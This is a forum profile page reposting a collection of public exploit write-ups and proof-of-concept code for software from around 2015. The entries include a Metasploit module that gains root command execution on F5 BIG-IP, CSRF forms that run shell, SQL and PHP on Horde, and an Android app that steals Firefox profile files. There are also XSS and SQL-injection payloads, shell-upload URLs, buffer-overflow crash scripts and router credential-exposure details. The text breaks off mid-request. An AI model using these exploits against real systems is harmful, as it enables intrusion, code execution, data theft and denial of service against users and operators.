HireHackking
Members
-
Joined
-
Last visited
Everything posted by HireHackking
-
#!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC # Discovery by : Luis Martínez # Email : l4m5@hotmail.com # Discovery Date : 18/11/2015 # Vendor Homepage : http://www.foundstone.com # Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx # Tested Version : 4.1 # Vulnerability Type : Denial of Service (DoS) Local # Tested on OS : Windows XP Professional SP3 x86 es # Steps to Produce the Crash: # 1.- Run python code : python super_scan_4.1_tools.py # 2.- Open super_scan_4.1_tools.txt and copy content to clipboard # 3.- Open SuperScan4.1.exe # 4.- Paste Clipboard Tools > Hostname/IP/URL # 5.- Clic on button -> Whois # 6.- Crashed buffer = "\x41" * 280 eip = "\x42" * 4 f = open ("super_scan_4.1_tools.txt", "w") f.write(buffer + eip) f.close() -
#!/usr/bin/env python # Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC # Discovery by : Vivek Mahajan - c3p70r # Discovery Date : 19/11/2015 # Vendor Homepage : http://samspade.org # Software Link : http://www.majorgeeks.com/files/details/sam_spade.html # Tested Version : 1.14 # Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite # Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64 # Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http:// buffer = "A"*510 file = open("spade.txt, 'w') file.write(buffer) file.close() # Follow on twitter @vik.create
-
Source: https://code.google.com/p/google-security-research/issues/detail?id=513 There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC. (/src/sdch/open-vcdiff/src/headerparser.cc) bool VCDiffHeaderParser::ParseSectionLengths( bool has_checksum, size_t* add_and_run_data_length, size_t* instructions_and_sizes_length, size_t* addresses_length, VCDChecksum* checksum) { ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled if (has_checksum) { ParseChecksum("Adler32 checksum value", checksum); } if (RESULT_SUCCESS != return_code_) { return false; } if (!delta_encoding_start_) { VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths " "was called before ParseWindowLengths" << VCD_ENDL; return_code_ = RESULT_ERROR; return false; } const size_t delta_encoding_header_length = UnparsedData() - delta_encoding_start_; if (delta_encoding_length_ != (delta_encoding_header_length + *add_and_run_data_length + *instructions_and_sizes_length + *addresses_length)) { // <---- Integer overflow here (32-bit systems only) VCD_ERROR << "The length of the delta encoding does not match " "the size of the header plus the sizes of the data sections" << VCD_ENDL; return_code_ = RESULT_ERROR; return false; } return true; } These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024) size_t add_and_run_data_length = 0; size_t instructions_and_sizes_length = 0; size_t addresses_length = 0; if (!header_parser->ParseSectionLengths(has_checksum_, &add_and_run_data_length, &instructions_and_sizes_length, &addresses_length, &expected_checksum_)) { return header_parser->GetResult(); } if (parent_->AllowInterleaved() && // snip... } else { // If interleaved format is not used, then the whole window contents // must be available before decoding can begin. If only part of // the current window is available, then report end of data // and re-parse the whole header when DecodeChunk() is called again. if (header_parser->UnparsedSize() < (add_and_run_data_length + instructions_and_sizes_length + addresses_length)) { return RESULT_END_OF_DATA; } data_for_add_and_run_.Init(header_parser->UnparsedData(), add_and_run_data_length); instructions_and_sizes_.Init(data_for_add_and_run_.End(), instructions_and_sizes_length); addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length); This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t. It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point. It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH. VERSION Chrome Version: 47.0.2499.0 Operating System: Linux x86 REPRODUCTION CASE Please include a demonstration of the security bug, such as an attached HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE make the file as small as possible and remove any content not required to demonstrate the bug. FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: browser Crash State: eax 0xf9ae8a78 -106001800 ecx 0xe7502d43 -414175933 edx 0x7b83e020 2072240160 ebx 0xf76597a0 -144336992 esp 0xe75025d0 0xe75025d0 ebp 0xe7502798 0xe7502798 esi 0x5 5 edi 0xf9061200 -117042688 eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94> eflags 0x210a93 [ CF AF SF IF OF RF ID ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99 => 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx 0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi 0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1) 0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118> 0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx #0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78 #1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231 #2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359 #3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887 #4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393 #5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83 #6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424 #7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131 #8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145 #9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673 #10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126 Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38763.zip
-
******************************************************************************************** # Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities # Date: 11/18/2015 # Exploit Author: Un_N0n # Vendor: NetWin # Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp # Version: 23d6 # Tested on: Windows 7 x64(64bit) ******************************************************************************************** [Info] Surgeftp web-interface suffers with multiple Stored XSS vulnerabilities. They are: Stored XSS in 'Domain Name' field. [How to?] 1. Open SurgeFTP web interface, Click on global option from the menu. 2. Add a new domain, in 'Domain Name' field, add in this(<img src=x onmouseover=alert(1)>) payload. 3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section. Stored XSS in 'Mirrors'. [How to?] 1. Open surgeftp web interface, Click on 'Mirrors' option from the menu. 2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this(<img src=x onmouseover=alert(1)>) payload. 3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field. Previously, Somebody else reported Stored XSS vulnerabilities in SurgeFTP. Vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the <script>alert('blah')</script> payload which is well not a good practice since i have triggered the same vulnerability by just entering different XSS payload, therefore White-listing is the correct solution.
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'nokogiri' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" } STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' } LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' } def initialize(info = {}) super( update_info( info, 'Name' => "F5 iControl iCall::Script Root Command Execution", 'Description' => %q{ This module exploits an authenticated privilege escalation vulnerability in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). This requires valid credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details) }, 'License' => MSF_LICENSE, 'Author' => [ 'tom', # Discovery, Metasploit module 'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module ], 'References' => [ ['CVE', '2015-3628'], ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'], ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['F5 BIG-IP LTM 11.x', {}] ], 'Privileged' => true, 'DisclosureDate' => "Sep 3 2015", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']), OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin']) ]) register_advanced_options( [ OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]), OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']), OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']), OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072]) ]) end def setup file = datastore['FILENAME'] file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}" @payload_path = ::File.join(datastore['PATH'], file) super end def build_xml builder = Nokogiri::XML::Builder.new do |xml| xml.Envelope do xml = xml_add_namespaces(xml) xml['soapenv'].Header xml['soapenv'].Body do yield xml end end end builder.to_xml end def xml_add_namespaces(xml) ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/") xml.doc.root.namespace = ns xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance") xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema") xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script") xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding") xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler") xml end def send_soap_request(pay) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 'data' => pay, 'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] ) if res return res else vprint_error('No response') end false end def create_script(name, cmd) create_xml = build_xml do |xml| xml['scr'].create(SOAPENV_ENCODINGSTYLE) do xml.scripts(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item name end xml.definitions(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item cmd end end end send_soap_request(create_xml) end def delete_script(script_name) delete_xml = build_xml do |xml| xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do xml.scripts(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item script_name end end end print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml)) res end def script_exists?(script_name) exists_xml = build_xml do |xml| xml['scr'].get_list(SOAPENV_ENCODINGSTYLE) end res = send_soap_request(exists_xml) res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}") end def create_handler(handler_name, script_name) print_status("Creating trigger #{handler_name}") handler_xml = build_xml do |xml| xml['per'].create(SOAPENV_ENCODINGSTYLE) do xml.handlers(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item handler_name end xml.scripts(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item script_name end xml.intervals(LONG_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first # we set this to run once every 24h, but because there is no # start/end time it will run once, more or less immediately, and # again 24h from now, but by that point hopefully we will have # cleaned up and the handler/script/etc are gone xml.item 60 * 60 * 24 end end end res = send_soap_request(handler_xml) if res if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler") true else print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}") false end else print_error("No response to trigger creation") false end end def delete_handler(handler_name) delete_xml = build_xml do |xml| xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do xml.handlers(STRING_ATTRS) do xml.parent.namespace = xml.parent.parent.namespace_definitions.first xml.item handler_name end end end print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml)) res end def handler_exists?(handler_name) handler_xml = build_xml do |xml| xml['per'].get_list(SOAPENV_ENCODINGSTYLE) end res = send_soap_request(handler_xml) res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}") end def check # strategy: we'll send a create_script request, with empty name: # if everything is ok, the server return a 500 error saying it doesn't like empty names # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'. # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable # any other response is considered not vulnerable res = create_script('', '') if res && res.code == 500 && res.body =~ /path is empty/ return Exploit::CheckCode::Appears elsif res && res.code == 401 print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?") return Exploit::CheckCode::Unknown else return Exploit::CheckCode::Safe end end def exploit # phase 1: create iCall script to create file with payload, execute it and remove it. shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path}) cmd = %(exec /bin/sh -c "#{shell_cmd}") arg_max = datastore['ARG_MAX'] if shell_cmd.size > arg_max print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\ "or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)" return false end script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}" print_status("Uploading payload script #{script_name}") unless (create_script_res = create_script(script_name, cmd)) print_error("No response when uploading payload script") return false end unless create_script_res.code == 200 print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\ "#{create_script_res.code} #{create_script_res.message}") return false end unless script_exists?(script_name) print_error("Payload script uploaded successfully but script was not found") return false end register_file_for_cleanup @payload_path # phase 2: create iCall Handler, that will actually run the previously created script handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}" unless create_handler(handler_name, script_name) delete_script(script_name) return false end unless handler_exists?(handler_name) print_error("Trigger created successfully but was not found") delete_script(script_name) return false end print_status('Waiting for payload to execute...') # if our payload has not been successfully executed just yet, wait # until it does or give up slept = 0 until session_created? || slept > datastore['SESSION_WAIT'] Rex.sleep(1) slept += 1 end print_status('Trying cleanup...') delete_script(script_name) delete_handler(handler_name) end end
-
Advisory ID: HTB23272 Product: Horde Groupware Vendor: http://www.horde.org Vulnerable Version(s): 5.2.10 and probably prior Tested Version: 5.2.10 Advisory Publication: September 30, 2015 [without technical details] Vendor Notification: September 30, 2015 Vendor Patch: October 22, 2015 Public Disclosure: November 18, 2015 Vulnerability Type: Cross-Site Request Forgery [CWE-352] CVE Reference: CVE-2015-7984 Risk Level: High CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde Groupware, used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information, stored in database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and company’s infrastructure. 1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984 1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server. CSRF exploit below sends HTTP POST request to vulnerable script and instructs it to display output of "/bin/ls" command. As a result, you will see contents of "/admin/" directory: <form action="http://[host]/admin/cmdshell.php" method="post" name="main"> <input type="hidden" name="cmd" value="ls"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> 1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with application’s database. The exploit code below executes "SELECT version()" query and displays version of current MySQL server: <form action="http://[host]/admin/sqlshell.php" method="post" name="main"> <input type="hidden" name="sql" value="SELECT version()"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> 1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server. The exploit code below executes the "phpinfo()" function and displays its output: <form action="http://[host]/admin/phpshell.php" method="post" name="main"> <input type="hidden" name="app" value="horde"> <input type="hidden" name="php" value="phpinfo();"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> ----------------------------------------------------------------------------------------------- Solution: Update to Horde Groupware 5.2.11 More Information: http://lists.horde.org/archives/announce/2015/001137.html ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware. [2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
-
source: https://www.securityfocus.com/bid/62480/info Mozilla Firefox is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass the same-origin policy and certain access restrictions to access data, or execute arbitrary script code in the browser of an unsuspecting user in the context of another site. This could be used to steal sensitive information or launch other attacks. Note: This issue was previously discussed in BID 62447 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2013-76 through -92 Multiple Vulnerabilities), but has been moved to its own record to better document it. This issue is fixed in Firefox 24.0. ckage jp.mbsd.terada.attackfirefox1; import android.net.Uri; import android.os.Bundle; import android.app.Activity; import android.content.Intent; public class MainActivity extends Activity { public final static String MY_PKG = "jp.mbsd.terada.attackfirefox1"; public final static String MY_TMP_DIR = "/data/data/" + MY_PKG + "/tmp/"; public final static String HTML_PATH = MY_TMP_DIR + "A" + Math.random() + ".html"; public final static String TARGET_PKG = "org.mozilla.firefox"; public final static String TARGET_FILE_PATH = "/data/data/" + TARGET_PKG + "/files/mozilla/profiles.ini"; public final static String HTML = "<u>Wait a few seconds.</u>" + "<script>" + "function doit() {" + " var xhr = new XMLHttpRequest;" + " xhr.onload = function() {" + " alert(xhr.responseText);" + " };" + " xhr.open('GET', document.URL);" + " xhr.send(null);" + "}" + "setTimeout(doit, 8000);" + "</script>"; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); doit(); } public void doit() { try { // create a malicious HTML cmdexec("mkdir " + MY_TMP_DIR); cmdexec("echo \"" + HTML + "\" > " + HTML_PATH); cmdexec("chmod -R 777 " + MY_TMP_DIR); Thread.sleep(1000); // force Firefox to load the malicious HTML invokeFirefox("file://" + HTML_PATH); Thread.sleep(4000); // replace the HTML with a symbolic link to profiles.ini cmdexec("rm " + HTML_PATH); cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH); } catch (Exception e) {} } public void invokeFirefox(String url) { Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url)); intent.setClassName(TARGET_PKG, TARGET_PKG + ".App"); startActivity(intent); } public void cmdexec(String cmd) { try { String[] tmp = new String[] {"/system/bin/sh", "-c", cmd}; Runtime.getRuntime().exec(tmp); } catch (Exception e) {} } }
-
source: https://www.securityfocus.com/bid/62493/info The RokIntroScroller plugin for WordPress is prone to multiple security vulnerabilities, including: 1. An arbitrary file-upload vulnerability 2. A cross-site scripting vulnerability 3. An information-disclosure vulnerability 4. A denial-of-service vulnerability Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. RokIntroScroller 1.8 is vulnerable; other versions may also be affected. http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/page.png&h=1&w=1111111 http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/big_file&h=1&w=1 http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/shell.php http://www.example.com/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
-
source: https://www.securityfocus.com/bid/62513/info The RokMicroNews plugin for WordPress is prone to multiple security vulnerabilities, including: 1. An information-disclosure vulnerability 2. A cross-site scripting vulnerability 3. An arbitrary file-upload vulnerability 4. A denial-of-service vulnerability Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http:// http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example1.com/big_file&h=1&w=1 http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example2.com/shell.php
-
source: https://www.securityfocus.com/bid/62572/info Monstra CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Monstra 1.2.0 is vulnerable; other versions may also be affected. POST /admin/ HTTP/1.1 Content-Length: 72 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Cookie: PHPSESSID=f6bd4782f77e4027d3975d32c414a36d Host: XXX Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* login=-1' or 85 = '83&login_submit=Enter&password=lincoln.dll
-
source: https://www.securityfocus.com/bid/62586/info ShareKM is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause the server to crash or disconnect, denying service to legitimate users. ShareKM 1.0.19 is vulnerable; prior versions may also be affected. #!/usr/bin/python import socket TCP_IP = '192.168.1.100' TCP_PORT = 55554 BUFFER_SIZE = 1024 MESSAGE = "\x41" * 50000 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TCP_IP, TCP_PORT)) s.send(MESSAGE) s.close()
-
source: https://www.securityfocus.com/bid/62581/info MentalJS is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
-
# Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple vulnerabilities] # Discovered by: Karn Ganeshen # CERT VU# 391604 # Vendor Homepage: [www.zte.com.cn] # Versions Reported # ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A # ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE Overview ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10 W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities. *CVE-ID*: CVE-2015-7248 CVE-2015-7249 CVE-2015-7250 CVE-2015-7251 CVE-2015-7252 *Note*: Large deployment size, primarily in Peru, used by TdP. Description *CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information Exposure* - CVE-2015-7248 Multiple information exposure vulnerabilities enable an attacker to obtain credentials and other sensitive details about the ZXHN H108N R1A. A. User names and password hashes can be viewed in the page source of http://<IP>/cgi-bin/webproc PoC: Login Page source contents: ...snip.... //get user info var G_UserInfo = new Array(); var m = 0; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "admin"; //UserName G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here G_UserInfo[m][2] = "1"; //Level G_UserInfo[m][3] = "1"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "user"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "2"; //Index m++; G_UserInfo[m] = new Array(); G_UserInfo[m][0] = "support"; //UserName G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here G_UserInfo[m][2] = "2"; //Level G_UserInfo[m][3] = "3"; //Index m++; ...snip... B. The configuration file of the device contains usernames, passwords, keys, and other values in plain text, which can be used by a user with lower privileges to gain admin account access. This issue also affects ZTE ZXV10 W300 models, version W300V1.0.0f_ER1_PE. *CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper Authorization* - CVE-2015-7249 By default, only admin may authenticate directly with the web administration pages in the ZXHN H108N R1A. By manipulating parameters in client-side requests, an attacker may authenticate as another existing account, such as user or support, and may be able to perform actions otherwise not allowed. PoC 1: 1. Login page user drop-down option shows only admin only. 2. Use an intercepting proxy / Tamper Data - and intercept the Login submit request. 3. Change the username admin to user / support and continue Login. 4. Application permits other users to log in to mgmt portal. PoC 2: After logging in as support, some functional options are visibly restricted. Certain actions can still be performed by calling the url directly. Application does not perform proper AuthZ checks. Following poc is a change password link. It is accessible directly, though it (correctly) is restricted to changing normal user (non-admin) password only. http:// <IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd Other functions / pages may also be accessible to non-privileged users. *CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') *- CVE-2015-7250 The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter which takes an unrestricted file path as input, allowing an attacker to read arbitrary files on the system. Arbitrary files can be read off of the device. No authentication is required to exploit this vulnerability. PoC HTTP POST request POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptLanguage: 